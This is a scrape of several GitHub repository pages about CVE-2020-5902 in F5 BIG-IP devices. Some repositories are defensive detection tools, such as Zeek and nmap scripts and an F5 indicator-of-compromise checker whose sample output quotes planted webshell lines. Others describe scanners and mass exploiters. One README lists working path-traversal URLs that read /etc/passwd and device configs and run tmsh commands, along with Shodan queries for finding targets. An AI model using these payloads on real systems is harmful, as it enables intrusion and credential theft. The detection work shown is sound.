master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit benjeems Add files via upload … 6e728f1 20 hours ago Add files via upload 6e728f1 Git stats 5 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time scripts Add files via upload 20 hours ago LICENSE Add files via upload 20 hours ago README.md Update README.md 20 hours ago bro-pkg.meta Add files via upload 20 hours ago zkg.meta Add files via upload 20 hours ago View code README.md CVE-2020-5902 (F5 BIG-IP devices) Summary: A Zeek detection package for CVE-2020-5902, a CVE10.0 vulnerability affecting F5 Networks BIG-IP devices. References: https://corelight.blog https://support.f5.com/csp/article/K52145254 https://us-cert.cisa.gov/ncas/alerts/aa20-206a Notices raised : By default both notices are enabled, however if you'd like to enable only the notice concerning a successful exploit you can change the option in scripts/bigIPF5.zeek to True i.e option only_monitor_for_successful_exploit: bool = T; Notice Enabled by default? Disable with only_monitor_for_successful_exploit = T BIGIP_exploit_attempt Yes Yes BIGIP_exploit_success Yes No Notices include up to 1500 bytes of the HTTP request headers as well as uri information, which can be helpful to speed up Incident Response and triage, without necessarily needing to refer back to a pcap. Example: #separator \x09 #set_separator , #empty_field (empty) #unset_field - #path notice #open 2020-07-27-16-57-12 #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] interval string stringstring double double 1595831352.218935 C9EcoD1bu0ertt08bb 192.168.31.37 63034 192.168.1.3 80 - - - tcp CVE_2020_5902::BIGIP_exploit_attempt An attempt to exploit an F5 BIG-IP device via CVE-2020-5902 was detected using uri '/hsqldb;' , however the server responded with a code='404' reason='Not Found', indicating the exploit attempt failed. The HTTP request headers are '{\x0a\x09[1] = [original_name=User-Agent, name=USER-AGENT, value=Wget/1.20.3 (darwin19.0.0)],\x0a\x09[2] = [original_name=Accept, name=ACCEPT, value=*/*],\x0a\x09[3] = [original_name=Accept-Encoding, name=ACCEPT-ENCODING, value=identity],\x0a\x09[4] = [original_name=Host, name=HOST, value=192.168.1.3],\x0a\x09[5] = [original_name=Connection, name=CONNECTION, value=Keep-Alive]\x0a}'. Refer to https://support.f5.com/csp/article/K52145254 - 192.168.31.37 192.168.1.3 80 - - Notice::ACTION_LOG 3600.000000 - - - - - Usage, notes and recommendations: To use against a pcap you already have zeek -Cr scripts/__load__.zeek your.pcap This package will run in live clustered or non clustered environments. This package has been prepared based on a selection of current publicly available information, not against pcaps of exploits. Feedback As details emerge, we are keen to improve this package for the benefit of the community, please feel free to contact the author with any suggestions and feedback. About A network detection package for CVE-2020-5902, a CVE10.0 vulnerability affecting F5 Networks, Inc BIG-IP devices. Resources Readme License BSD-3-Clause License Releases No releases published Languages Zeek 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit Zinkuth committed e31eee1 2 minutes ago … Create CVE-2020-5902 Exploit POC.md Git stats 1 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902 Exploit POC.md Create CVE-2020-5902 Exploit POC.md 2 minutes ago View code About No description, website, or topics provided. Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit qlkwej committed fb6f2e1 1 minute ago … Update README.md Git stats 3 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-check.py PoC CVE-2020-5902 5 minutes ago README.md Update README.md 1 minute ago example1.png PoC CVE-2020-5902 5 minutes ago usage1.png PoC CVE-2020-5902 5 minutes ago View code README.md PoC for CVE-2020-5902 this just sample PoC to demonstrated the issue Limitation Only scan HTTPS for now, it can be configure to scan HTTP or any custom port(s). Usage Proof About dummy poc Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit k3nundrum committed 273c78e 6 minutes ago … Create CVE-2020-5902.py Git stats 1 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902.py Create CVE-2020-5902.py 6 minutes ago View code About No description, website, or topics provided. Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit rwincey committed 85682c8 5 minutes ago … Create http-f5-tmui-path-traversal.nse Simple nmap script for detecting CVE-2020-5902. Git stats 1 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time http-f5-tmui-path-traversal.nse Create http-f5-tmui-path-traversal.nse 5 minutes ago View code About No description, website, or topics provided. Releases No releases published Languages Lua 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit heiyu121 committed e172bd2 3 minutes ago CVE-2020-5902复现 Git stats 3 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE/CVE-2020-5902 CVE-2020-5902复现 3 minutes ago README.md CVE-2020-5902复现 3 minutes ago View code README.md Licae CVE漏洞库逐步构建 About 小型项目 Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit xyele committed 12dfe77 10 minutes ago … Nuclei Template Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902.yaml Nuclei Template 10 minutes ago LICENSE Initial commit 11 minutes ago README.md Initial commit 11 minutes ago View code README.md CVE-2020-5902 In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. About In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. Resources Readme License GPL-3.0 License Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit cristiano-corrado committed e4543eb 4 minutes ago … first commit Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time conf first commit 4 minutes ago README.md first commit 4 minutes ago f5_scanner.py first commit 4 minutes ago logger.py first commit 4 minutes ago requirements.txt first commit 4 minutes ago threads.py first commit 4 minutes ago View code README.md f5_scanner F5 mass scanner and CVE-2020-5902 checker This tool is mass scanner with 30 threads hardcoded use with caution How to setup $ python3 -m venv venv $ source venv/bin/activate $ python3 -m pip install -r requirements.txt How to run Single IP python3 f5_scanner.py --ip 192.168.1.1 CIDR python3 f5_scanner.py --cidr 192.168.0.0/24 File the file should be 1 by line set of single ip address eg : 192.168.0.1 192.168.0.2 192.168.0.3 python3 f5_scanner.py --file file_with_ips.txt About F5 mass scanner and CVE-2020-5902 checker Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit dwisiswant0 committed 7279f69 6 minutes ago … Update README.md Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 6 minutes ago View code README.md CVE-2020-5902 Shodan http.favicon.hash:-335242539 "3992" About CVE-2020-5902 Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit mheathf5 committed 223ed85 19 minutes ago Initial commit Git stats 1 commits 1 branch 1 tag Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902_bigip_ioc_checker.py Initial commit 19 minutes ago README.md Initial commit 19 minutes ago View code README.md CVE-2020-5902 IoC Detection Tool This script is intended to be executed locally on an F5 BIG-IP in Advanced Shell (bash) by a user with root privileges; it is not intended to be run in any other setting. Note: Appliance Mode does not allow access to Advanced Shell, and therefore this tool cannot be run on such systems. The script examines the BIG-IP for the Indicators of Compromise associated with CVE-2020-5902 which were known to F5 Networks at the time of authoring. The script collates these IoCs and presents a report as an overview you can use to inform your determination of the best path forward. If this tool uncovers any IoCs, you should manually examine and confirm them, then follow your own documented procedures for handling suspected compromised systems. F5 specific guidance may be found in K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system. Note: If you have any uncertainty or doubt as to the integrity of any system, the cautious approach is to consider the system compromised and to follow your internal procedures for handling a compromised system. Note also that any information contained on a compromised system should itself be considered compromised. This includes, but is not limited to, passwords, private keys, digital certificates, configurations, logs, etc. Limitations and considerations It must be noted that IoCs may no longer be present either due to age (for example, by log rotation schedules) or removal by a sufficiently skilled adversary. As exploitation of CVE-2020-5902 potentially results in remote code execution as the root user, a skilled attacker would be free to sanitize the system of traces after exploitation. Note also that an attacker could poison any binary on the system, including python. Reasonable steps have been taken to avoid the possibility of this; however, you must determine your level of trust in the output of this tool on any system suspected to be compromised. On BIG-IP versions that include sys-eicheck (13.1.0 onward), this tool offers the administrator the opportunity to check the running system against the original installation RPMs to look for any file modifications in an attempt to ensure the integrity of the system commands this tool relies upon. Note that sys-eicheck can be run on all platforms regardless of FIPS capability. On earlier versions the tool does not currently include this functionality and will run without checking the originally installed system binaries for tampering. Verifying the authenticity of this script The sha384 sum of this version of CVE-2020-5902_bigip_ioc_checker.py is: 1583bc8b6a52c71bb49fce26c6f67be2c65aa1f42c433a13fc79616f01a84994b76eaa8ff4bc19ef7833b8f145ba6136 You should only download these files from the F5 DevCentral GitHub repository CVE-2020-5902 information Note that the authoritative source of information on CVE-2020-5902 is always the F5 Security Advisory, K52145254: TMUI RCE vulnerability CVE-2020-5902 Running the script Simply download the file CVE-2020-5902_bigip_ioc_checker.py to the target BIG-IP and run it using the python installation already present on BIG-IP. Example: [root@hostname:Active:Standalone] tmp # python CVE-2020-5902_bigip_ioc_checker.py -h USAGE: python CVE-2020-5902_bigip_ioc_checker.py You can use the following options <-iajylcbwut> to skip some checks: Option: -i or --skip_sys-eicheck [+] Skip using the sys_eicheck utility to scan the BIG-IP system for any unexpected changes to the system software. [+] Please refer to https://support.f5.com/csp/article/K00029945for more details about the sys-eicheck utility. [+] The sys-eicheck utility may take several minutes to finish. Option: -a or --skip_audit_check [+] Skip scanning the audit log for malicious activities. Option: -j or --skip_journal_check [+] Skip scanning the journal log for malicious activities. Option: -y or --skip_systems_check [+] Skip scanning /config/bigip_user.conf to look for malicious users. Option: -l or --skip_alias_check [+] Skip scanning /config/bigip_*.conf for malicious alias definition. Option: -c or --skip_catalina_check [+] Skip scanning the tomcat catalina.out log for malicious activities. Option: -b or --skip_bigipstartup_check [+] Skip checking if /config/startup contains blacklisted words. Option: -w or --skip_webshell_check [+] Skip checking Files created after 2020 Jun 29 in the /usr/local/www/ to look for possible webshell files. Option: -u or --skip_autostart_check [+] Skip checking Files created after 2020 Jun 29 in /etc/ to look for the possible autostart script. Option: -t or --skip_tmp_check [+] Skip checking Files created after 2020 Jun 29 in /tmp Option: -p or --disable_color_print [+] Disable color print, better for saving result Option: -q or --bigiq_cmd_check [+] Run BIG-IQ compatible malicious command check Option: -h or --help [+] Print usage Known Issues If a BIG-IP is managed by BIG-IQ or another automation/management system, it may receive bash commands from the BIG-IQ or another automation/management system. Some of the bash commands have the base64 encoding script embedded. Those bash commands logged in the BIG-IP audit logs could lead the IoC Detection Tool to report false positives notification: "!! IoC pattern malicious bash command found". To reduce the falses positives, you can use -q option to make the IoC Detection Tool ignore the legitimate base64 encoded script in the audit logs. Upgrading the system may update the timestamps on files in /usr/local/www/ which may result in a false positive, for example, if the fixed software was recently installed. If any results are returned for any of the file creation date checks, in /usr/local/www/, /etc/, and /tmp/, the files should be examined to determine their legitimacy. It is possible to still find Indication of Compromise from the journalctl logs after an upgrade to a fixed version or after applying the workaround. Please review the time stamp of the logs should they be present and verify they happened before the upgrade or applying the workaround. Sample Output # python CVE-2020-5902_bigip_ioc_checker.py -iqa >>>> Skip sys-eicheck check >>>> Run BIG-IQ compatible malicious command check >>>> Skip audit log check CVE-2020-5902 Indicators of Compromise checker. False positive reports are possible and all results should be manually verified. [+] Version 13.1.0 Build 0.0.1868 CVE-2020-5902 Fixed: False !! IoC pattern ['/etc/fakefile', '/etc/passwd', '/etc/fakefile1'] access denied in file /var/log/tomcat/catalina.out !! IoC pattern ['/config/bigip_base.conf'] access denied in file /var/log/tomcat/catalina.out.1 !! IoC pattern Possible backdoor echo "<?php eval(\$_REQUEST[09ede7]);" > /usr/local/www/xui/common/css/webshell.php in file /config/startup !! IoC pattern Possible backdoor echo "Runtime.getRuntime().exec("cmd.exe /C " + cmd);" > /usr/local/www/xui/common/css/webshell.jsp in file /config/startup [+]========================== auto start script checking ========================== !! Files created in /etc/ after 2020 Jun 29, need to check if those are malicious daemon startup script 95291 1 -rw-r--r-- 1 root root 0 Jul 20 14:49 /etc/rc.d/init.d/autostartbackdoor 104847 4 -rw------- 1 root root 199 Jul 13 10:46 /var/spool/cron/root [+]================================ /tmp/ checking ================================ !! File /tmp/backdoor_curl could be a malicous script !! File /tmp/CVE-2020-5902_bigip_ioc_checker.py could be a malicous script !! Files created in /tmp/ after 2020 Jun 29, need to check if those are malicious scripts 18491 40 -rw-r--r-- 1 root root 38066 Jul 20 14:57 /tmp/CVE-2020-5902_bigip_ioc_checker.py 18497 1 -rw-r--r-- 1 root root 0 Jul 20 14:49 /tmp/backdoor_new [+]============================== webshell checking ============================== !! Files created in /usr/local/www/ after 2020 Jun 29, need to check if those are webshell or information leakage 243368 4 -rw-r--r-- 1 root root 33 Jul 20 14:49 /usr/local/www/xui/common/css/webshell.php 243367 4 -rw-r--r-- 1 root root 33 Jul 17 08:30 /usr/local/www/xui/common/css/css.php 243369 4 -rw-r--r-- 1 root root 46 Jul 20 14:49 /usr/local/www/xui/common/css/webshell.jsp EULA, Warranty and licenses F5 provides the CVE-2020-5902 IoC Detection Tool to help its customers analyze their F5 devices outside of iHealth for certain indicators of compromise related to CVE-2020-5902. Please note, however, that: The CVE-2020-5902 IoC Detection Tool is not comprehensive, nor is it intended to be: it does not identify all possible indicators of compromise, but only a select group that F5 has found to be generally reliable based on its internal analyses of compromised F5 devices. Not all compromised F5 devices show the same indicators and attackers may be able to remove traces of their work. It is not possible to prove that any device has not been compromised; if there is any uncertainty, additional analysis may be required and/or you may want to consult with your security team. To avoid undue interruption to a user’s business operations, the CVE-2020-5902 IoC Detection Tool should not be operated during peak traffic hours and should instead generally be used during users’ regular maintenance windows. If indicators of compromise are identified, F5 recommends that users follow their documented internal incident response procedures. F5 has provided general considerations and guidance for when a security compromise on a BIG-IP system is suspected in K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system. Additionally, users can contact F5 directly for additional support via the Customer Support Portal or other standard channels. The CVE-2020-5902 IoC Detection Tool is made available for F5 users’ convenience and is provided on an “as is” basis under the terms of the Apache License. You use the CVE-2020-5902 IoC Detection Tool at your own risk. Copyright © 2020 F5 Networks, Inc. Licensed under the Apache License, Version 2.0 (the “License”); you may not use the CVE-2020-5902 IoC Detection Tool except in compliance with the License. You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. About No description, website, or topics provided. Resources Readme Releases 1 Version 1.2 Release Latest 13 minutes ago Languages Python 100.0%

master 1 branch 0 tags Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit murataydemir Initial commit … 6a34c5a 1 minute ago Initial commit 6a34c5a Git stats 1 commits Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Initial commit 1 minute ago View code README.md F5-BIG-IP-CVE-2020-5902-Remote-Code-Execution F5 BIG-IP CVE-2020-5902 Remote Code Execution About F5 BIG-IP CVE-2020-5902 Remote Code Execution Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit pwnhacker0x18 committed 8ae5639 8 minutes ago Update README.md Git stats 5 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 8 minutes ago Screenshot from 2020-07-11 00-47-30.png Add files via upload 9 minutes ago WorkspaceUtils.java Add files via upload 14 minutes ago directoryList_jsp.java Add files via upload 14 minutes ago exp.py Add files via upload 14 minutes ago fileRead_jsp.java Add files via upload 14 minutes ago fileSave_jsp.java Add files via upload 14 minutes ago tmshCmd_jsp.java Add files via upload 14 minutes ago View code README.md I am not responsible for any damage caused by this program CVE-2020-5902-Mass Mass exploit for CVE-2020-5902 Overview About Mass exploit for CVE-2020-5902 Resources Readme Releases No releases published Languages Java 90.4% Python 9.6%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit r0ttenbeef committed 1fef658 40 seconds ago … Initial commit Git stats 1 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Initial commit 40 seconds ago View code README.md cve-2020-5902 cve-2020-5902 POC exploit About cve-2020-5902 POC exploit Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit c130rg committed ea87522 36 seconds ago Update README.md Git stats 5 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 36 seconds ago checkvulnCVE20205902.ps1 Add files via upload 5 minutes ago funcionamento.png Add files via upload 5 minutes ago View code README.md checkvulnCVE20205902 A powershell script to check vulnerability CVE-2020-5902 of ip list The instructions there are in the code Keep security! About A powershell script to check vulnerability CVE-2020-5902 of ip list Resources Readme Releases No releases published Languages PowerShell 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit Any3ite committed 9f3fd7d 3 minutes ago … Update README.md Git stats 6 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902-F5BIG-Scanner.go Add files via upload 11 minutes ago QQ图片20200707134623.png Add files via upload 11 minutes ago README.md Update README.md 3 minutes ago View code README.md CVE-2020-5902-F5BIG Just Run Command like 👇 go run CVE-2020-5902-F5BIG-Scanner.go -u *.*.*.* -p 443 -m R -f /etc/issue or go run CVE-2020-5902-F5BIG-Scanner.go -u *.*.*.* -p 443 -m C About No description, website, or topics provided. Resources Readme Releases No releases published Languages Go 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit halencarjunior committed 5976cd4 4 minutes ago Readme fix Git stats 3 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time LICENSE Initial commit 2 days ago README.md Readme fix 4 minutes ago f5scan.py f5scan - First Version 7 minutes ago requirements.txt f5scan - First Version 7 minutes ago View code README.md f5scan F5 BIG IP Scanner for CVE-2020-5902 by bt0 More information about the Vulnerability: https://support.f5.com/csp/article/K52145254?sf235665517=1 Requirements: python3+ shodan colorama urlopen pyOpenSSL $ pip3 install -r requirements Options -h, --help show this help message and exit -H HOST, --host HOST IP or Hostname of target -p PORT, --port PORT Port of target. Default=443 -hl HOSTLIST, --hostlist HOSTLIST Use a hosts list e.g. ./hosts.txt -s, --shodan Search for hosts in Shodan (Needs api key) -e, --exploit exploit target -c COMMAND, --command COMMAND command to execute -lf LFI, --lfi LFI File to read using LFI Vulnerability --version show program's version number and exit About No description, website, or topics provided. Resources Readme License GPL-3.0 License Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit dnerzker committed 187623f 34 seconds ago Update README.md Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time README.md Update README.md 34 seconds ago View code README.md CVE-2020-5902 ###(Summary) bash In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. (Proof of concept) https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin ``` ### POC for CVE-2020-5902 ```bash GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=randomstuff GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=AnyMsgHereWillBeReflectedInTheResponse inurl://"tmui/login.jsp" intitle://"BIG-IP" inurl://"tmui" ~~ Try use the following queries for shodan: 1. F5-login-pages 2. www-authenticate: Basic realm:BIG-IP 3. BigIP / BIG-IP 4. htt.favicon.hash:-335242539 5. http.title:"BIG-IP&req:- Redirect" ~~ Try use the following queries for censys: 1.433.https.get.body_sha256:5d78eb6fa93b995f9af90b632f0016e80dbcda8eb71a17994678692585ee5 2.433.https.get.title:"BIG-IP&req:- Redirect" ``` ## Credits: dnerzker ## About No description, website, or topics provided. Resources Readme Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit jiansiting committed 21ab57d 9 minutes ago … Create F5BIG-Scanner.py version 1.0 Git stats 2 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time .gitattributes Initial commit 10 minutes ago .gitignore Initial commit 10 minutes ago F5BIG-Scanner.py Create F5BIG-Scanner.py 9 minutes ago View code About F5 BIG-IP Scanner (CVE-2020-5902) Releases No releases published

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit jinnywc committed 0ae9518 4 minutes ago … Add files via upload Git stats 3 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time exp_cve_2020_5902.py Add files via upload 4 minutes ago View code About CVE-2020-5902 Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit telnet200 committed 20981d3 now Create 1111 Git stats 5 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time cve-2020-5902 Create 1111 now README.md Update README.md 10 days ago cve-2020-5902 BIG-F5.py Add files via upload 17 minutes ago tttt Create tttt 2 minutes ago View code README.md Exploit About 个人收集的一些exp Resources Readme Releases No releases published Languages Python 100.0%

Branch: master Go to file Code Clone with HTTPS Use Git or checkout with SVN using the web URL. Download ZIP Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching GitHub Desktop If nothing happens, download GitHub Desktop and try again. Go back Launching Xcode If nothing happens, download Xcode and try again. Go back Launching Visual Studio If nothing happens, download the GitHub extension for Visual Studio and try again. Go back Latest commit d4rk007 committed 4d8e7b7 1 minute ago Update CVE-2020-5902-mass-exploiter.py Git stats 5 commits 1 branch 0 tags Files Permalink Failed to load latest commit information. Type Name Latest commit message Commit time CVE-2020-5902-mass-exploiter.py Update CVE-2020-5902-mass-exploiter.py 1 minute ago README.md Update README.md 2 minutes ago View code README.md F5-Big-IP-CVE-2020-5902-mass-exploiter F5 Big-IP CVE-2020-5902 mass exploiter/fuzzer. usage: mass.py -l list.txt -w workers About F5 Big-IP CVE-2020-5902 mass exploiter/fuzzer. Resources Readme Releases No releases published Languages Python 100.0%

